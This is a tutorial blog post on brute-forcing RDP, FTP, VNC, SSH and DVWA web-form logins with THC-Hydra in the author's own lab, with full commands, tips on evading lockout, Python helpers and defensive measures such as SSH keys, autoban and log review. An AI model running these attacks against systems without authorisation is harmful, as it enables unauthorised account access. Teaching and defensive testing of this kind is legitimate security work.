Brute Forcing Passwords with THC-Hydra

What is THC-Hydra?

Hydra is a very fast online password cracking tool that can perform rapid dictionary attacks against more than 50 protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and many more. THC (The Hacker's Choice) created Hydra for researchers and security consultants to show how easy it can be to gain unauthorized access to a system remotely.


Installing THC-Hydra

If you are running Kali Linux you will already have a version of Hydra installed. On any other Debian based Linux distribution you can install it from the repository with:

sudo apt-get install hydra

or you can download the latest version from THC's public GitHub development repository at https://github.com/vanhauser-thc/thc-hydra

Start by using git to clone the GitHub repository:

git clone https://github.com/vanhauser-thc/thc-hydra

Next, change into the thc-hydra directory:

cd thc-hydra

Now run:

./configure

then:

make

and finally:

sudo make install


Hydra-GTK

Hydra-GTK is a GUI front end for Hydra, so you need to have THC-Hydra installed before you can use it. If you are running Kali Linux it will already be pre-installed; everyone else can install it by typing:

sudo apt-get install hydra-gtk

Once installed you will have a new application called xHydra. Open it and you should see a window like the one pictured below.

You can find the latest information about the Hydra-GTK project on its GitHub page: https://github.com/vanhauser-thc/thc-hydra/tree/master/hydra-gtk

If you have already downloaded Hydra from THC's GitHub repository, you have also downloaded the latest version of Hydra-GTK.

Within the thc-hydra folder you downloaded from THC's GitHub earlier you should see a folder called hydra-gtk:

cd hydra-gtk/

Before I could compile the source code I had to install the GTK 2.0 dependency:

sudo apt-get install gtk2.0

Once that was installed I was able to compile the source code as normal:

./configure
make
sudo make install

THC-Hydra’s Help File

Once you have Hydra installed you can check out its help file by typing hydra -h:

hydra -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
 -R restore a previous aborted/crashed session
 -I ignore an existing restore file (dont wait 10 seconds)
 -S perform an SSL connect
 -s PORT if the service is on a different default port, define it here
 -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
 -p PASS or -P FILE try password PASS, or load several passwords from FILE
 -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
 -y disable use of symbols in bruteforce, see above
 -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
 -u loop around users, not passwords (effective! implied with -x)
 -C FILE colon separated "login:pass" format, instead of -L/-P options
 -M FILE list of servers to attack, one entry per line, ':' to specify port
 -o FILE write found login/password pairs to FILE instead of stdout
 -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
 -t TASKS run TASKS number of connects in parallel per target (default: 16)
 -T TASKS run TASKS connects in parallel overall (for -M, default: 64)
 -w / -W TIME waittime for responses (32) / between connects per thread (0)
 -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
 -v / -V / -d verbose mode / show login+pass for each attempt / debug mode 
 -O use old SSL v2 and v3
 -q do not print messages about connection errors
 -U service module usage details
 server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
 service the service to crack (see below for supported protocols)
 OPT some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: postgres sapr3 firebird afp ncp ssh sshkey svn oracle mysql5 and regex support.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)
 % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
 % export HYDRA_PROXY_HTTP=http://login:[email protected]:8080
 % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
 hydra -l user -P passlist.txt ftp://192.168.0.1
 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
 hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
 hydra -l admin -p password ftp://[192.168.0.0/24]/
 hydra -L logins.txt -P pws.txt -M targets.txt ssh


Brute Force / Dictionary Attack

Hydra can use either a dictionary attack, where you give Hydra an explicit list of words to try, or a brute force attack, which tries every possible combination of characters. Each has its benefits and drawbacks.

A dictionary attack uses a precompiled list of words, or word list. This speeds up the cracking process compared with brute force because the program only has to run through each word in the list, but if the password is not in that word list the attack will fail.

If you are running Kali you will already have a whole bunch of word lists to use; just type locate wordlist in a terminal to find their location.

If you are not running Kali, you can download some good word lists from the SkullSecurity.org password wiki. Look for rockyou.txt, as this is what I will be using in the examples below.

If this were a targeted attack against a particular person you could use something like CUPP (Common User Passwords Profiler) to create a word list more specific to the target. It takes a birthday, nickname, address, pet's name and so on; enter the details you know or can find out via social media and it will create a word list based on your inputs.

Brute force cracks a password by trying every possible combination of characters, so, for example, it will try aaaa, then aaab, aaac, aaad and so on. This considerably increases the time the attack takes but reduces the likelihood that the attack fails.

In Hydra you use the -x option to enable brute force mode. The brute force options have their own help page, which you can get to by typing hydra -x -h.

hydra -x -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
             valid CHARSET values are: 'a' for lowercase letters,
             'A' for uppercase letters, '1' for numbers, and for all others,
             just add their real representation.
  -y         disable the use if the above letters as placeholders

Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-
   -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and 1 only

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/
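As an added example (not part of the original post or of Hydra itself), the following Python script parses a -x MIN:MAX:CHARSET specification the way the help text above describes it, works out how many candidates it covers, and estimates how long exhausting them would take at a given rate, which is the calculation a defender makes when deciding whether a password policy puts a search out of reach. The placeholder letters and the -y behaviour follow the help text; the rate of 4 attempts per second is an assumed figure.

```python
from string import ascii_lowercase, ascii_uppercase, digits

# The placeholder letters listed by "hydra -x -h".
PLACEHOLDERS = {"a": ascii_lowercase, "A": ascii_uppercase, "1": digits}

def expand_charset(spec, literal=False):
    """Expand a CHARSET spec into the alphabet the generator would draw from.

    With literal=True (Hydra's -y) the letters a, A and 1 stop being
    placeholders and stand for themselves like any other character.
    """
    chars = []
    for ch in spec:
        if not literal and ch in PLACEHOLDERS:
            chars.extend(PLACEHOLDERS[ch])
        else:
            chars.append(ch)
    # Duplicates do not enlarge the alphabet, so keep one of each (order kept).
    return "".join(dict.fromkeys(chars))

def parse_x_option(option, literal=False):
    """Split 'MIN:MAX:CHARSET' (the argument to -x) and validate the lengths."""
    min_s, max_s, charset = option.split(":", 2)
    lo, hi = int(min_s), int(max_s)
    if lo < 1 or hi < lo or not charset:
        raise ValueError(f"invalid -x specification: {option!r}")
    return lo, hi, expand_charset(charset, literal)

def keyspace(option, literal=False):
    """Number of candidates over all lengths MIN..MAX: the sum of |alphabet|**n."""
    lo, hi, alphabet = parse_x_option(option, literal)
    n = len(alphabet)
    return sum(n ** length for length in range(lo, hi + 1))

def worst_case_seconds(option, attempts_per_second, literal=False):
    """Seconds needed to exhaust the keyspace at a sustained attempt rate."""
    return keyspace(option, literal) / attempts_per_second

if __name__ == "__main__":
    # Assumed rate: 4 parallel tasks that each complete about one attempt per
    # second, which is the sort of pace the RDP example further down runs at.
    RATE = 4.0
    for spec, y in [("3:5:a", False), ("5:8:A1", False), ("3:5:aA1", True), ("8:8:aA1", False)]:
        days = worst_case_seconds(spec, RATE, y) / 86400
        flag = " -y" if y else ""
        print(f"-x {spec}{flag}: {keyspace(spec, y):,} candidates, ~{days:,.1f} days at {RATE:g}/s")
```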

RDP

To set the scene, I have a Windows 2012 server with Remote Desktop set up running in my virtual lab. The virtual machine has an IP of 192.168.34.16 and one user called administrator.

So let's fire up Hydra with our rockyou word list and run this command:

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16

-t 4 – This sets the number of tasks that run in parallel; in this example I have used 4, which sends 4 login attempts at a time. RDP does not like too many connections at the same time, so try to keep it at a maximum of 4. It is sometimes worth adding -w to your command to add a wait between attempts.
-V – Verbose; this shows you each username and password on screen as it is tried.
-f – Quits once a positive username and password match has been found.
-l administrator – Use the username administrator to attempt to log in.
-P rockyou.txt – This is the word list we will be pulling passwords from.
rdp://192.168.34.16 – This is the service we want to attack and the IP address.

You should see each attempt as Hydra tries to connect to RDP, like pictured below. As we have used the -f option Hydra will stop once it has found a positive match.

In Event Viewer on the Windows 2012 server with RDP enabled you will see lots of Event ID 4625 entries in the Security log. As you can see below, this gives away a lot of information to the system admin about where the brute force has come from.


If you are the admin of a server whose RDP is getting brute forced, you can mitigate this by changing the default port RDP listens on, or, if you have a router that lets you translate ports, that is probably the better option.

If you're interested in changing the port RDP listens on in a Windows PC, start by opening the Registry Editor (regedit).

Then locate the following registry sub key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\PortNumber

On the Edit menu, click Modify, and then click Decimal.

Type the new port number, and then click OK.

Quit the Registry Editor.

Then Restart the Computer.

Once the computer restarts you will be able to connect to it using Remote Desktop Connection as normal, but you now need to add a colon (:) and the new port at the end of the address, like pictured below.


Another option is to restrict RDP access by telling the Windows Firewall which IPs are allowed to connect to the RDP port and which are not. I have already done a tutorial on this; check that out here.


FTP

Using the same Windows 2012 server I used for the RDP brute force above, I installed the latest version of FileZilla Server, which can be downloaded from https://filezilla-project.org/

I'm not going to go into the ins and outs of setting up FileZilla Server; there are plenty of guides for that online. Just know that I set up this FTP server with one user called admin and a password of [email protected]

Then I ran this Hydra command in the terminal. Notice I have used a capital -L in this command: this specifies a word list containing usernames. Use a lowercase -l if you want to specify a single username.

hydra -t 5 -V -f -L userlist -P passwordlist ftp://192.168.34.16

-t 5 – This sets the number of tasks, or logins, it will try simultaneously. I have gone for 5 here, but remember not to go too high as it may give you false results.
-V – Verbose; this displays the login and password tried in the terminal for each attempt.
-f – Quits once Hydra has found a positive username and password match.
-L userlist – The capital -L means I'm using a word list of usernames called userlist; a lowercase -l would specify a single username to try.
-P passwordlist – The capital -P means I'm using a word list called passwordlist; a lowercase -p would specify a single password to try.
ftp://192.168.34.16 – This is the service we want to attack and the IP address of the FTP server.

You will see each attempt as Hydra tries all the specified username and password combinations until it either finds a match or runs out of combinations.

As you can see below, every attempt is logged in the FileZilla console; you can also see all 5 login tasks running simultaneously at the bottom.

Within FileZilla you can enable autoban to stop an attacker brute forcing the FTP username and password. When enabled, this blocks the IP address the attacker is logging in from after a specified number of failed logins; the default is 10.


Interestingly, Hydra just continued to try passwords even though my IP was banned. It went through the whole username and password list and reported that nothing in the list matched, even though I know the username and password were on that list.


VNC

I have installed VNC server on the Linux Mint box at 192.168.100.155 running in my virtual lab and set a VNC server password of [email protected]. A quick rundown of how to set this up in Mint is below.

apt-get install vnc4server
vncpasswd
Password:[email protected]
Verify:[email protected]
vncserver

In the past VNC has been a very insecure program, as there is no login name and any password can be set without having to meet any complexity requirements. That being said, newer versions have added a blacklist feature that will block you after 5 failed login attempts.

So for our brute force to work I have had to switch off the blacklisting feature by running this command on the Linux Mint box:

vncconfig -display :1 -set BlacklistTimeout=0 -set BlacklistThreshold=1000000

This will stop me from blacklisting myself in my test lab, on a live engagement I would suggest increasing the wait time per try in hydra (-W ) to anything over 60 and if you are attacking an older version of VNC this blacklisting feature is not enabled by default.

Also, as a little side note, don't use more than 4 tasks (-t 4) in your command, as you may find it gives you some false negatives, and remember there is no username on VNC connections so we won't need -l in our command.

After you have turned off the blacklisting feature, run this command:

hydra -P passwordlist -t 1 -w 5 -f -s 5901 192.168.100.155 vnc -v

-P passwordlist – The capital -P means I'm using a word list called passwordlist; a lowercase -p would specify a single password to try.
-t 1 – This sets the number of tasks, or logins, it will try simultaneously. I have gone for 1 here, but remember not to go higher than 4 when brute forcing VNC.
-w 5 – This sets the wait time between tries. I have gone for 5 here, but remember to go a lot higher if the blacklisting feature is still enabled.
-f – Quits once Hydra has found a positive password match.
-s 5901 – This changes the port Hydra connects to on the VNC server from the default of 5900 to 5901, which is what my VNC server defaulted to.
192.168.100.155 vnc – This specifies the IP address of the VNC server and the service we want to attack.
-v – Verbose; this displays the password tried in the terminal for each attempt.

Once the command is run you should see an output like this.

As I said above, VNC passwords are notably weak, and you should never expose a VNC server directly to the internet. The blacklist time-out feature prevents some brute forcing of the password, but if you hit the server slowly enough not to get blacklisted it can still be brute forced.

Instead, you should bind the VNC server to 127.0.0.1 by adding -localhost to the command line:

vncserver -localhost

then use SSH tunnelling to link a port on your machine to the port on the server (replace the placeholders with your SSH user and the server's address):

ssh -L 5901:localhost:5901 <user>@<ServerIP>

Then, while that SSH connection is alive, you can connect your VNC client to port 5901 on your own machine.

If you want more information about SSH tunnelling check out my tutorial all about SSH here

Just before I finish with brute forcing VNC: you can find the VNC logs in a hidden folder called .vnc in your home folder. The contents of the log will look something like the text below. At points 1: and 2: you can see Hydra trying the wrong password, and point 3: is where the password was correct. Interestingly, it does not seem to record the IP address of the PC I am using to brute force it.

1:SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40744 (Authentication failure)
 2: Connections: accepted: 0.0.0.0::40746
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40746 (Authentication failure)
 3: Connections: accepted: 0.0.0.0::40748
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 VNCSConnST: Server default pixel format depth 16 (16bpp) little-endian rgb565
 Connections: closed: 0.0.0.0::40748 (Clean disconnection)
 SMsgWriter: framebuffer updates 0
 SMsgWriter: raw bytes equivalent 0, compression ratio -nan


SSH

To set the scene here, I have Linux Mint running in my virtual lab on 192.168.100.155 with SSH installed. On the Linux Mint box I created a user called admin with a password of [email protected]

I have already done a tutorial on setting up Linux Mint in VirtualBox here,

and I also have a guide on installing SSH in Linux; check out that tutorial here.

OK, so now that we have our virtual machine with SSH running on it, we can use this command in Hydra to start brute forcing the SSH login:

hydra -l admin -P passwordlist ssh://192.168.100.155 -V

-l admin – The lowercase l states that I am specifying a single username; use a capital L if you want to specify a user list.
-P passwordlist – The capital P says I'm specifying a list of passwords in a file called passwordlist.
ssh://192.168.100.155 – This is the service we want to attack and the IP address of the SSH server.
-V – Verbose; this displays the login and password tried in the terminal for each attempt.

Once you run this command you should see all the attempts in the terminal, like pictured below. Notice that because I have not added -t to the command the number of simultaneous logins will be 16, which is the default.

If you are interested, SSH logs access attempts in /var/log/auth.log.

To make this log a bit easier on the eyes you can use the tail command to display the last x lines of your auth.log.

Use the following command to view the last 100 lines of your SSH log:

tail -100 /var/log/auth.log | grep 'sshd'
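As an added example (not from the original post), here is a small Python detector for the kind of sshd lines that command shows: it parses the "Failed password" and "Accepted password" entries, counts failures per source address inside a time window, and flags a successful login that arrives after a run of failures, which is what a brute force looks like in the log once it finds the password. The log lines it runs on are constructed samples in sshd's format; the hostname, the year (syslog lines do not carry one) and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# sshd writes results like these to /var/log/auth.log (syslog prefix, then
# "Failed password for [invalid user] USER from IP port N ssh2").
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2"
)

def parse_line(line, year=2017):
    """Return (timestamp, result, user, ip) for a password-auth result line,
    or None for anything else. Syslog lines carry no year, so one is assumed."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Return alerts as (kind, ip, user, timestamp) tuples.

    'burst': a source reached `threshold` failures inside `window_seconds`
    (reported once per source). 'success-after-failures': a source that had
    already failed at least `threshold` times then logged in successfully.
    """
    failures = defaultdict(list)   # ip -> timestamps of failed attempts
    burst_reported = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            failures[ip].append(ts)
            recent = [t for t in failures[ip] if (ts - t).total_seconds() <= window_seconds]
            if len(recent) >= threshold and ip not in burst_reported:
                burst_reported.add(ip)
                alerts.append(("burst", ip, user, ts))
        elif len(failures[ip]) >= threshold:
            alerts.append(("success-after-failures", ip, user, ts))
    return alerts

def sample_log():
    """Constructed sample in sshd's format (not a real capture): 12 failures in
    12 seconds from one source followed by a success, plus a user on another
    machine who mistypes once and then gets in."""
    lines = [
        f"Jan 12 14:03:{s:02d} mint sshd[{2000 + s}]: Failed password for admin "
        f"from 192.168.100.20 port {50100 + s} ssh2"
        for s in range(12)
    ]
    lines += [
        "Jan 12 14:03:12 mint sshd[2012]: Accepted password for admin from 192.168.100.20 port 50112 ssh2",
        "Jan 12 14:05:00 mint sshd[2100]: Failed password for invalid user bob from 192.168.100.30 port 40000 ssh2",
        "Jan 12 14:05:09 mint sshd[2101]: Accepted password for robert from 192.168.100.30 port 40001 ssh2",
        "Jan 12 14:05:10 mint sshd[2101]: pam_unix(sshd:session): session opened for user robert by (uid=0)",
    ]
    return lines

if __name__ == "__main__":
    for kind, ip, user, ts in detect_bruteforce(sample_log()):
        print(f"{ts:%H:%M:%S} {kind}: {ip} (account {user})")
```

On a real system, feed it the output of the tail command above (or the whole file) one line at a time; the default threshold of 10 failures in 60 seconds is far below the 16 parallel connections Hydra makes by default.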

To stop someone brute forcing your SSH password you can turn off password authentication altogether and enable SSH key authentication. If you are interested in setting up SSH key authentication, check out my tutorial on SSH.


Webpage Login

Now, this is where things start to get fun: you can use Hydra to brute force webpage logins. To get this to work you need some information about the login page, such as whether it uses a POST or a GET request, before you can construct your Hydra command.

The website login I am going to brute force is DVWA (Damn Vulnerable Web App), which, if you have already taken a look at my tutorial on setting up a vulnerable LAMP server, you will already have set up and ready to go.

You are also going to need some sort of proxy installed to capture and identify the key parameters of the web login page so we can create our Hydra command. I will be using the Firefox plugin Tamper Data, but you can just as easily use Burp Suite.

The Tamper Data Firefox plugin can be downloaded from https://addons.mozilla.org/en-GB/firefox/addon/tamper-data/

So to start, open the DVWA website in your browser (in my lab I go to http://192.168.100.155/dvwa) and log in to the DVWA site with the default credentials of admin / password.

You can brute force this main login page too, but it's a little more advanced than what I want to get into here.

Once logged in, go to the DVWA Security button on the left-hand side of the page and make sure the security level is set to low.

Once the security is set to low click the Brute Force button on the menu on the left-hand side.

This is the login page we are going to brute force.

Start by firing up Tamper Data; I normally do this in Firefox by hitting the Alt key and selecting it from the Tools menu.


Now Tamper Data is open, click Start Tamper and it will proxy all your Firefox traffic through Tamper Data, allowing us to capture the login request.


Now go back to DVWA, enter any old username and password and click Login. Tamper Data will capture the login request and ask if you want to tamper with it; just click Submit.

Go back to Tamper Data, right click the first GET request captured and click Copy.

Next, open any text editor and paste everything we copied from Tamper Data. It should look something like this:

We now just have to take note of the message the DVWA website returns to tell us we have entered a wrong username and password.


We now have everything to construct our hydra command against this login page.

The command should look something like the one below. Notice that all this information was gathered from Tamper Data, and the only part that will differ on yours is the value after PHPSESSID=.

hydra 192.168.100.155 -V -l admin -P passwordlist http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low"

192.168.100.155 – The IP address of the server hosting the webpage.
-V – Verbose; this displays the login and password tried in the terminal for each attempt.
-l admin – The lowercase l states that I am specifying a single username; use a capital L if you want to specify a user list.
-P passwordlist – The capital P says I'm specifying a list of passwords in a file called passwordlist.
http-get-form – Tells Hydra to use the http-get-form module.
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login – All these details were found in the Tamper Data request we copied to our text editor.
F=Username and/or password incorrect. – This is the failed login message we received from the DVWA login page; it tells Hydra that when this string is not in the response we have a valid login.
H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low – This is the cookie we were issued when we logged into the DVWA site at the start, also found in Tamper Data.

If you get an error like the one pictured below, where it gives you more than one valid password, it means that you have not constructed the command correctly and probably just need to check that the syntax is correct.

Normally either the PHPSESSID is wrong or the failed login message is not formatted correctly.
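To see why a wrong failure string or a stale cookie produces that result, here is an added Python model (not part of the original post or of Hydra) of how the condition string is evaluated: a plain or F= string marks an attempt successful when the string is absent from the response, and S= marks it successful only when the string is present. The response bodies and word list are constructed, and plain substring matching is assumed.

```python
# Constructed response bodies, cut down to the line that matters in each case.
WRONG_PASSWORD = "<pre><br />Username and/or password incorrect.</pre>"
RIGHT_PASSWORD = "<p>Welcome to the password protected area admin</p>"
LOGIN_FORM = "<form action='login.php' method='post'>DVWA login</form>"  # expired session

def is_valid_login(body, condition):
    """Mirror how the http-get-form condition string is read. A bare string or
    'F=string' names the failure text, so the attempt counts as a success when
    that text is ABSENT; 'S=string' counts it as a success only when the text
    is PRESENT. Assumption: plain substring matching, as in the command above."""
    if condition.startswith("S="):
        return condition[2:] in body
    if condition.startswith("F="):
        condition = condition[2:]
    return condition not in body

def report_valid(attempts, condition):
    """Passwords that would be reported as valid, given (password, body) pairs."""
    return [pw for pw, body in attempts if is_valid_login(body, condition)]

def simulate(wordlist, session_valid, correct="password"):
    """Constructed stand-in for the DVWA brute-force page: with a valid session
    the right password gets the welcome page and every other one the error
    message; with an expired PHPSESSID every request is bounced to the login form."""
    attempts = []
    for pw in wordlist:
        if not session_valid:
            body = LOGIN_FORM
        elif pw == correct:
            body = RIGHT_PASSWORD
        else:
            body = WRONG_PASSWORD
        attempts.append((pw, body))
    return attempts

WORDLIST = ["123456", "qwerty", "password", "letmein"]   # constructed
GOOD_F = "F=Username and/or password incorrect."
TYPO_F = "F=Username and password incorrect."           # text that never appears
GOOD_S = "S=Welcome to the password protected area"

if __name__ == "__main__":
    print(report_valid(simulate(WORDLIST, True), GOOD_F))    # ['password']
    print(report_valid(simulate(WORDLIST, True), TYPO_F))    # every word reported valid
    print(report_valid(simulate(WORDLIST, False), GOOD_F))   # every word reported valid
    print(report_valid(simulate(WORDLIST, False), GOOD_S))   # []: nothing matched
```

The last two runs are the situation the post describes: once the failure text can never appear, every candidate looks like a hit, whereas an S= condition on the success page fails closed instead.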


If you want more information on Hydra's http-get-form module, take a look at its help page by typing hydra http-get-form -U in your terminal.

Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax: <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
with usernames and passwords being replaced in the "^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by "F=", successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri to define a different page to gather initial cookies from
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
All colons that are not option separators should be escaped (see the examples above and below).
You can specify a header without escaping the colons, but that way you will not be able to put colons
in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
"/login.php:user=^USER^&pass=^PASS^:incorrect"
"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
"/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"


That's all I'm going to do for now on brute forcing passwords with THC-Hydra. If there are any more you would like me to show you, or you have some feedback for me, please leave a comment below.

2 thoughts on “Brute Forcing Passwords with THC-Hydra”

1. Hi Marko, thanks for the comment.

GET and POST requests are quite similar, and if you know how it works with GET you should not have a problem changing the command to http-post-form.

If you need more information check out Hydra's help module for http-post-form by typing hydra http-post-form -U into your terminal.
